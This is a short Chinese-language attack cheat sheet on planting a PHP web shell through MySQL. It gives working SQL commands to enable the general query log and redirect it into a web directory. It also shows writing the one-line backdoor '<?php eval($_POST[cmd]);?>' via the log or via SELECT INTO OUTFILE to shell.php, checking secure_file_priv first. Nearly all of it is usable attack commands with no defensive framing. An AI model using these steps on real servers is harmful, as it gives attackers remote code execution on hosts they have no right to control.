一、查看绝对路径
select @@basedir;
二、日志文件写一句话
1、查看是否开启日志
show variables like '%general%';
2、设置日志状态
show variables like 'general_log'; // 查看日志是否开启
set global general_log=on; // 开启日志功能
show variables like 'general_log_file'; // 看看日志文件保存位置
set global general_log_file='C:\\phpStudy\\stu1.log'; // 设置日志文件保存位置
show variables like 'log_output'; // 看看日志输出类型 table或file
set global log_output='table'; // 设置输出类型为 table
set global log_output='file'; // 设置输出类型为file
3、写入一句话
<?php eval($_POST['cmd']);?>
4、连接一句话木马
三、导出一句话
1、查看是否允许被导入导出
- secure_file_priv为null 表示不允许导入导出;
- secure_file_priv指定文件夹时,表示mysql的导入导出只能在指定的文件夹;
- secure_file_priv没有设置时,则表示没有任何限制;
show global variables like '%secure%';
2、当secure_file_priv为空时,写入一句话
select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'c:/phpStudy/WWW/shell.php';